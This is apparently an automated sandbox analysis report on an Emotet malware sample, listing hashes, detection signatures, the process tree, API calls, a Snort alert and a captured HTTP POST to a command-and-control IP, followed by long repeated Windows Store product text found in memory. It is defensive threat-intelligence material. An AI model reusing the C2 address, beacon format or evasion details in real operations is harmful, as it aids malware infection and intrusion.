Analysis Report 2ojdmC51As.exe

Overview

General Information

Sample Name: 2ojdmC51As.exe
Analysis ID: 319735
MD5: 5804d97670dcdfab88ba830682355dad
SHA1: 65c817fb511824fa185f34ecd744b836ed7a19eb
SHA256: 4e885ada930e285a005c5211b8a652dc0eb11a06ccf530561afa88aefe99c9fc

Detection

Emotet
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • 2ojdmC51As.exe (PID: 6240 cmdline: 'C:\Users\user\Desktop\2ojdmC51As.exe' MD5: 5804D97670DCDFAB88BA830682355DAD)
    • sort.exe (PID: 4564 cmdline: C:\Windows\SysWOW64\setupugc\sort.exe MD5: 5804D97670DCDFAB88BA830682355DAD)
  • svchost.exe (PID: 6680 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6748 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7124 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000000.00000002.667768852.0000000000664000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000001.00000002.931663752.0000000002244000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.2ojdmC51As.exe.2230000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
1.2.sort.exe.2270000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp Malware Configuration Extractor: Emotet
Machine Learning detection for sample
Source: 2ojdmC51As.exe Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02272650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,1_2_02272650
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02272290 CryptGetHashParam,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,memcpy,CryptExportKey,GetProcessHeap,RtlAllocateHeap,1_2_02272290
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02271FB0 memcpy,GetProcessHeap,RtlAllocateHeap,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt,CryptDuplicateHash,1_2_02271FB0
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004182CC FindFirstFileA,FindClose,0_2_004182CC
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,0_2_00417B29
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_022338F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,0_2_022338F0
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_004182CC FindFirstFileA,FindClose,1_2_004182CC
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,1_2_00417B29
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_022738F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,1_2_022738F0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.4:49742 -> 200.116.145.225:443
Source: Joe Sandbox View ASN Name: EPMTelecomunicacionesSAESPCO EPMTelecomunicacionesSAESPCO
Source: global traffic HTTP traffic detected:
    POST /0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    Referer: 200.116.145.225/
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=---------hcIbcONok
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 200.116.145.225:443
    Content-Length: 4628
    Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 200.116.145.225
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_022729B0 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW,1_2_022729B0
                Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
                Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
                Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU",
"SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z||.||18ebec36-1675-40c0-a5d4-25e9e774360f||1152921505692410033||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU",
"SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z||.||18ebec36-1675-40c0-a5d4-25e9e774360f||1152921505692410033||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                Source: svchost.exe, 00000006.00000003.758971863.0000027873F66000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.facebook.com (Facebook)
                Source: svchost.exe, 00000006.00000003.758971863.0000027873F66000.00000004.00000001.sdmp String found in binary or memory equals www.twitter.com (Twitter)
                Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory equals www.facebook.com (Facebook)
                Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory equals www.twitter.com (Twitter)
                Source: svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                Source: svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor 